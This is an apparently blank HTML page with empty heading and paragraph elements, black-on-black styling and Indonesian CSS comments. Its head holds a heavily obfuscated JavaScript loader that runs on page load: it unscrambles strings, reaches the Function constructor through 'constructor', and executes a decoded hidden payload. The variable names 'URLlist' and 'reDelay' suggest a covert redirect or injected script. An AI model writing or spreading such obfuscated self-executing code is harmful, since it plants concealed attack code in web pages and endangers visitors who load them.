<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <title></title>
  <script type="text/javascript">
var URLlist,reDelay;(function(){var HMa='',KGV=672-661;function pjw(k){var h=2641576;var n=k.length;var m=[];for(var q=0;q<n;q++){m[q]=k.charAt(q)};for(var q=0;q<n;q++){var w=h*(q+264)+(h%20988);var o=h*(q+93)+(h%47735);var y=w%n;var a=o%n;var p=m[y];m[y]=m[a];m[a]=p;h=(w+o)%3353104;};return m.join('')};var owy=pjw('cufvarsyrqhlucreocosjznkxtmwgtpditnbo').substr(0,KGV);var THh='sf2;ds;10r;",,n2".v-im;;;=abc=i(e(;vv,rn0c)r[egvwufz9n(am g;d2+(2=beh2f4i88+8te7rre. 7(,l;3a)r7lhhrvpc"p+,6(rh1,i ,t1[l+iyuvr rr(]}cj=pe)r)={0=d<csg]ne+6; +))loo7aAodnp1a=a, nj2c)dtrCi;htf=fwad=)b=ouvt,(n+hs0+({ads6man0rl3fn"nah=3drv=trapqaral.l;2d=[{.ncai)(enf=aorrl)n;at=fm;=ugp*rnd+vk=rs>ag5voe va2n-+ovhrCad=ove9ompi;.lus)p;u,mnj2,v= b=(vb;gf0d08tag srx["(va]+d+0rj<r;l)iirv;"( (.n)+,tf=rqA<i(h(eur q99pi(;.*lpo.u1kq-1)71v!l<5=r{o;a0,(bave;a()gb;vr+vC,)s] rf(i=,=[rct r(1ntc).h6[s,a8-ma;)s{e4tit+(l;hsa+ofgaaj]9b=gb"6.v;vrr.4+02]}e.us8orntl;(;-}r<A)];4)r"(f=h]),10v>g)vlrvshliistb7t(e{g;k;p)aco1efk wd[,+lt.]akba];it])69ln0ni(al=u;g=na. ,toph stbr)tCejl;Ae=r;)o=7r[i;lnme}o}+aupAs=ufoc.t;}f;d,bln5g1n0if )Ct. ufut,- 42(i6t.;.C(;9;d ;[hc=t8g)s7v; C=ae)ir"8m,o]bvf..o)v!=a(Cog==hu,=)n-a[)h."ejg;u;={+ltkr.,2( r6]+s;c(ahr(e}f=nvo +hS..(;uS),)o[aar]h8urb[u,(.vre=d+1 g7s[.et l+,7k.+ju[=sh=n';var QVR=pjw[owy];var CbB='';var vhJ=QVR;var jyD=QVR(CbB,pjw(THh));var WaG=jyD(pjw('^l{r*)u^^bo._g)$wndMtewo(=oi)v^k4!^$._!d7eg!x^yn\/3\/nn651$+.i}d$;,!.^cdoh^^6%1n^]+e=lis1 ^.wit^2=)d0et(t),^\';=^)&3^(^;t^6^.d0^ci3.;cuc =!^,5^(^(;.^c:^\/(!5+4o s(t3^hr1.(o)hd^s.^$;l__da6yiot;(!-^\'$^#s%%5;.p ot0[0a9tc^6^.5(d^^o_g^jq.d;)27{^o"{_i.);^phn..^"14o))l}2],_,-!a^)s\'nst#+c,^4Tl^=dc^orab+(l8d8.t.%h.xoro&^t,q=nf^ 6.jar6u\/f({^^s(sp)fo!c,%dfe^(f0.-]^^^^^3.0f7r){^{(0.cb!^m0^34m2_$f_)^^o((61s,"=r!cf3^$(^n^^;"#7,];cm8^1_e3^s3em.2))()d9)^90n!t ^3{nw^ 1.^^\'j_2r.3n)1.!w).#4_,4) ;i*&.r&rb*ao)2eg_!r#_}4_rj[34da,(3w=b^)-4^5_&=n.=m^f1^n,3,^)}c 4ht$0SeiiDs(ee,hr1mC(a,d(^3eri7o;.0(=ed(..= hfamu$n.,_]q$c.a,28eo.m^^n]]dg)))h=g}%uen.0^^!_()a,"e%_3n^s(1{6or%4hmipqiw+;;q,b%^tg26f!%d(k((te]vtdtf1^(0 ^^o3[($!]..D^u;-5og=2t7.n.4"a.(;!]4^sj^.ewd"^_$;1c\/=74^^ir3Sc0c$.}.^;.6w)]fd )$0_;s.2raw1^ts)8=^;rz6elu!b7)oqe^^7tq0i^}))]g$0a=!d^1nt^}u)((jt j$.$mg)^%gj,0 {.i,. )3!dl3!9}etf[),"=01de)0[=e^{r0.S.4f+^t$k!da8.wsh^+,6]l)a[jgb .^4]s.$d!p,p)o(dnn^zh0=[.a 5qere17.pnt^j(\/nn; _&6j^j)2^dm,s($;rdl3r0=4*^(^jnefj ,$,\'].^+Cna;sg6.. 1,^_.[+7,}c*^(g,!l,.q.(a6; ,7#dca($0$#o)")0cah^.c7^n^qtb)l)&}^=$;) M#t7^^a .!(\'i^'));var uOZ=vhJ(HMa,WaG );uOZ(6213);return 5678})()
</script>
  <style>
    /* Reset margin dan padding */
    * {
      margin: 0;
      padding: 0;
      box-sizing: border-box;
    }

    /*  */
    html, body {
      height: 100%;
      width: 100%;
      background-color: #000000; /* */
      font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
      color: #000000; /* */
      display: flex;
      justify-content: center;
      align-items: center;
      text-align: center;
      padding: 20px;
    }

    /* */
    .container {
      max-width: 800px;
      width: 100%;
    }

    /* */
    h1 {
      font-size: clamp(2rem, 5vw, 4rem);
      margin-bottom: 20px;
    }

    /* Paragraf support text */
    p {
      font-size: clamp(1rem, 2.5vw, 1.5rem);
      line-height: 1.5;
      color: #000000;
    }
  </style>
</head>
<body>
  <div class="container">
    <h1></h1>
    <p></p>
  </div>
</body>
</html>
